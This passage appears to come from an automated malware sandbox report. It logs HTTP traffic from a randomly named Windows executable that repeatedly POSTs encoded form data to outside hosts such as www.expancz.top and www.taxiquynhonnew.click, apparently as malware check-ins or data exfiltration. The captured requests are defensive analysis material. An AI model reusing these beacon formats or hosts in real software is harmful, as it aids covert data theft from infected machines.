                                                                  Data Raw: 38 34 45 68 56 44 59 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 53 53 35 64 63 77 6d 31 67 4b 5a 59 2b 35 35 56 6e 37 54 47 77 6a 6e 65 73 2b 67 65 55 43 31 74 67 76 55 6f 44 54 30 3d
                                                                  Data Ascii: 84EhVDY=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLSS5dcwm1gKZY+55Vn7TGwjnes+geUC1tgvUoDT0=
                                                                  Dec 12, 2024 21:38:28.317806005 CET697INHTTP/1.1 405 Not Allowed
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:28 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 552
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.849716107.155.56.30805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:29.424287081 CET830OUTPOST /2gcl/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.expancz.top
                                                                  Origin: http://www.expancz.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.expancz.top/2gcl/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 67 70 67 43 52 49 79 4f 54 73 49 37 62 2b 2b 52 7a 30 55 56 63 37 74 4d 59 5a 55 34 62 61 34 4d 45 46 33 49 50 63 31 65 68 6e 44 65 7a 62 68 51 45 50 4d 68 6f 69 65 6d 65 4f 4e 59 44 50 63 53 49 49 52 73 50 72 77 39 48 34 31 75 46 33 5a 48 42 53 30 76 6d 4c 4f 77 71 64 71 6f 6b 77 54 61 79 79 6e 73 41 69 65 32 66 43 52 4b 4d 45 63 2b 63 5a 32 4b 4e 6c 62 43 56 43 63 78 53 4c 68 49 4a 35 79 76 49 2f 39 5a 62 41 7a 6a 50 31 73 39 49 6f 52 31 6f 46 36 4d 45 59 64 45 68 41 38 31 59 43 56 55 68 53 69 4c 7a 38 62 47 32 64 6e 71 6a 4b
                                                                  Data Ascii: 84EhVDY=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjP1s9IoR1oF6MEYdEhA81YCVUhSiLz8bG2dnqjK
                                                                  Dec 12, 2024 21:38:30.990894079 CET697INHTTP/1.1 405 Not Allowed
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:30 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 552
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.849717107.155.56.30805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:32.126044035 CET1847OUTPOST /2gcl/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.expancz.top
                                                                  Origin: http://www.expancz.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.expancz.top/2gcl/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 6f 70 67 78 5a 49 7a 70 48 73 4c 37 62 2b 7a 78 7a 31 55 56 63 71 74 4d 41 56 55 35 6d 74 34 4b 49 46 78 62 48 63 6c 76 68 6e 59 4f 7a 62 2b 67 45 4d 54 52 6f 7a 65 6d 4f 4b 4e 59 7a 50 63 53 49 49 52 72 33 72 79 70 54 34 7a 75 46 30 65 48 42 57 77 76 6e 46 4f 30 47 4e 71 6f 51 4b 54 4c 53 79 69 34 73 69 63 45 48 43 54 71 4d 61 53 65 64 61 32 4b 52 6d 62 43 49 37 63 78 6d 68 68 4b 5a 35 33 2b 74 2b 68 36 76 69 6b 41 33 6a 73 2b 73 70 59 6b 51 4b 31 4f 51 31 61 45 4e 55 74 6c 41 53 54 47 35 2b 70 36 53 55 4e 43 66 48 6a 36 65 32 66 7a 4a 47 78 50 61 4d 58 76 36 30 6c 62 4c 32 51 39 67 6a 6b 48 50 6b 53 6b 4e 54 66 66 6a 63 2f 6f 33 41 35 54 73 78 48 59 48 53 51 30 6b 71 2b 47 73 64 63 76 73 4e 67 64 6f 39 51 54 71 68 56 2b 35 38 37 2f 70 65 45 70 47 4a 48 71 41 6a 52 4c 49 52 2b 35 4b 36 4e 55 44 5a 4e 62 64 6d 70 6c 78 32 46 46 59 5a 48 54 4c 6a 5a 32 [TRUNCATED]
                                                                  Data Ascii: 84EhVDY=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsopgxZIzpHsL7b+zxz1UVcqtMAVU5mt4KIFxbHclvhnYOzb+gEMTRozemOKNYzPcSIIRr3rypT4zuF0eHBWwvnFO0GNqoQKTLSyi4sicEHCTqMaSeda2KRmbCI7cxmhhKZ53+t+h6vikA3js+spYkQK1OQ1aENUtlASTG5+p6SUNCfHj6e2fzJGxPaMXv60lbL2Q9gjkHPkSkNTffjc/o3A5TsxHYHSQ0kq+GsdcvsNgdo9QTqhV+587/peEpGJHqAjRLIR+5K6NUDZNbdmplx2FFYZHTLjZ2uENQ82BeT4xf5FpIa25PHSiG7jVXrYaoI5ym5sgQeQ5yp6e8zBqMq637ySr7YPKMU7QCxOW7+nGdn3w7r6829DO2axev0cbZRLEqDZUe5p6HFnlIpVjY0VNIJqcMM+dCAbz7OoZQ/cG2298voQBhGDaWo6tF6oxSGoFwvL48LTeNjHepalx5yTWaDO0Dy6+3auIK6PFnVSYw7NYQMPR3nxYkIueKINyAM1AT5TpSyk9wlJIizbuiHYfxfMgytpijNj8J5IWkRPZn7ZeDAeRkw2C0AyW5y99LaLvulSREoKfxW5r2Z3y337ezT0LCGMGFdD8nvgKwBbOtl3RpQKmymMV0uuTK6UVmk/Vnj4a9/aYTqkMLbBK5PdgOq64tYu44KoQS2esH8iX3AgS2e59Jq3I3rJOoequQAY8dnSpNkaBSnJVV46bXN7G6RYpWzMPPwBdHOFWoVAA1eikMWuTdMsE+zExojsIcdg31I8kUD77BlawHG11gw79Fwl5WUI1czJjjh2Rx7yvGXsJtnlzwnsA5PpQ0ZCVRBnlS60MkP49ny5py7yt/9Ln1SHULhRjDVp46m3EszBv0PWR4OEy2KUmlWBsHyv6KMe0MsUSBbBgIN6W4vvsX6XL2xKX4a8mBWBco9hOhvrLb/J8P91OxnQMG7pedSHCMWg [TRUNCATED]
                                                                  Dec 12, 2024 21:38:33.693423033 CET697INHTTP/1.1 405 Not Allowed
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:33 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 552
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.849718107.155.56.30805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:34.777084112 CET560OUTGET /2gcl/?84EhVDY=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmW5Tm5D5tQBI3B1+VDfuWeAsbbOCckpfS6ddEbXQs3erVRA==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.expancz.top
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:38:36.355451107 CET1236INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:36 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 9651
                                                                  Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: "6736b650-25b3"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 6b 65 79 77 6f 72 64 73 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 79 70 65 20 63 6f 6e 74 65 6e 74 3d 77 65 62 73 69 74 65 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 69 74 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                                  Dec 12, 2024 21:38:36.355465889 CET1236INData Raw: 2f 2f 6c 33 66 69 6c 65 6a 73 6f 6e 34 64 76 64 2e 6a 6f 73 79 6c 69 76 69 6e 67 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 20 74 79 70 65 3d 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 20 72 65 6c 3d 69 63 6f 6e 3e 3c 73 74 79 6c 65 3e 23 50 4f 50
                                                                  Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                                  Dec 12, 2024 21:38:36.357352972 CET1236INData Raw: bb a5 e5 8f 8a e4 bb a5 e5 90 8e e7 89 88 e6 9c ac e5 8f af e4 bb a5 e4 bd bf e7 94 a8 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c
                                                                  Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                                  Dec 12, 2024 21:38:36.357367039 CET672INData Raw: 20 20 20 20 20 20 20 20 20 6d 79 42 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6d 79 53 63 72 69 70 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 7d 65 6c 73 65 7b 0a 20 20 20 20 20
                                                                  Data Ascii: myBody.appendChild(myScript); return true; }else{ return false; } }else{ return false; } } var pathInfo = ''; var baseJsUrl = isAtm ? 'https://dq0ib5xlct7tw.cloudfron
                                                                  Dec 12, 2024 21:38:36.359385967 CET1236INData Raw: 0a 20 20 20 20 20 20 79 61 68 6f 6f 53 6f 75 72 63 65 3a 20 27 33 27 2c 0a 20 20 20 20 20 20 74 69 6b 54 6f 6b 53 6f 75 72 63 65 3a 20 27 34 27 0a 20 20 20 20 7d 3b 0a 20 20 20 20 2f 2f 20 e6 b8 a0 e9 81 93 e5 9f 8b e7 82 b9 e5 88 a4 e6 96 ad 0a
                                                                  Data Ascii: yahooSource: '3', tikTokSource: '4' }; // // function checkSource(data, ch) { return Object.keys(data).map(function (key) { return data[key] }).indexOf(ch)
                                                                  Dec 12, 2024 21:38:36.359400034 CET1236INData Raw: 20 20 20 20 74 2e 61 73 79 6e 63 20 3d 20 21 30 3b 0a 20 20 20 20 20 20 20 20 74 2e 73 72 63 20 3d 20 76 3b 0a 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 5b 30 5d 3b 0a 20 20 20
                                                                  Data Ascii: t.async = !0; t.src = v; s = b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t, s) }(window, document, 'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('dataProcessi
                                                                  Dec 12, 2024 21:38:36.359410048 CET1236INData Raw: 3d 20 30 3b 20 6e 20 3c 20 74 74 71 2e 6d 65 74 68 6f 64 73 2e 6c 65 6e 67 74 68 3b 20 6e 2b 2b 29 20 74 74 71 2e 73 65 74 41 6e 64 44 65 66 65 72 28 65 2c 20 74 74 71 2e 6d 65 74 68 6f 64 73 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                  Data Ascii: = 0; n < ttq.methods.length; n++) ttq.setAndDefer(e, ttq.methods[ n]); return e }, ttq.load = function(e, n) { var i = "https://analytics.tiktok.com/i18n/pixel/events.js"; ttq._i = ttq._i
                                                                  Dec 12, 2024 21:38:36.361515999 CET1236INData Raw: 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 67 6f 6f 67 6c 65 5f 69 64 20
                                                                  Data Ascii: aLayer.push(arguments);} gtag('js', new Date()); gtag('config', google_id || 'G-CC0LH72W84'); console.log('google PageView');</script><script type=application/javascript>if(localStorage.source === sourceData.yahooSource) { (f
                                                                  Dec 12, 2024 21:38:36.361530066 CET578INData Raw: 3d 20 6e 6f 77 3b 0a 20 20 20 20 20 20 7d 2c 20 66 61 6c 73 65 29 3b 0a 20 20 20 20 20 20 2f 2f 20 2f 2f 20 e9 98 bb e6 ad a2 e5 8f 8c e6 8c 87 e6 94 be e5 a4 a7 0a 20 20 20 20 20 20 2f 2f 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c
                                                                  Data Ascii: = now; }, false); // // // document.addEventListener('gesturestart', function (event) { // event.preventDefault(); // }); }</script><link href=/static/css/app.8625cfbde75fd1ee0a0c2bb00d896


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.84971918.139.62.226805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:42.772784948 CET837OUTPOST /y49d/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.taxiquynhonnew.click
                                                                  Origin: http://www.taxiquynhonnew.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 72 34 72 4b 63 69 62 56 53 78 34 76 42 51 52 5a 42 77 42 61 4e 6f 4c 76 62 42 4e 47 68 73 2b 47 2f 50 48 7a 76 6f 6b 64 41 6e 63 75 4f 37 4b 34 58 41 58 68 4a 58 70 6e 7a 36 33 66 2f 2f 54 7a 49 4d 34 53 56 47 30 39 72 68 70 34 63 6f 52 7a 53 67 44 6a 65 6e 2b 43 6a 31 4f 38 6a 65 55 63 32 63 69 75 58 72 64 65 61 56 54 59 77 72 6f 49 78 39 4a 35 53 2b 32 71 64 53 71 55 66 42 74 59 64 76 33 57 38 52 72 59 55 51 57 56 36 4d 67 37 51 59 49 59 67 55 79 77 7a 6e 76 6d 47 39 64 51 6c 55 61 36 39 72 50 38 66 51 39 66 44 69 30 53 68 2b 54 37 68 4f 67 76 51 4c 68 69 7a 56 38 4b 73 31 78 34 41 35 67 3d
                                                                  Data Ascii: 84EhVDY=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQlUa69rP8fQ9fDi0Sh+T7hOgvQLhizV8Ks1x4A5g=
                                                                  Dec 12, 2024 21:38:44.289469004 CET371INHTTP/1.1 301 Moved Permanently
                                                                  Server: openresty
                                                                  Date: Thu, 12 Dec 2024 20:38:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 166
                                                                  Connection: close
                                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.84972018.139.62.226805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:45.451946974 CET857OUTPOST /y49d/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.taxiquynhonnew.click
                                                                  Origin: http://www.taxiquynhonnew.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.taxiquynhonnew.click/y49d/
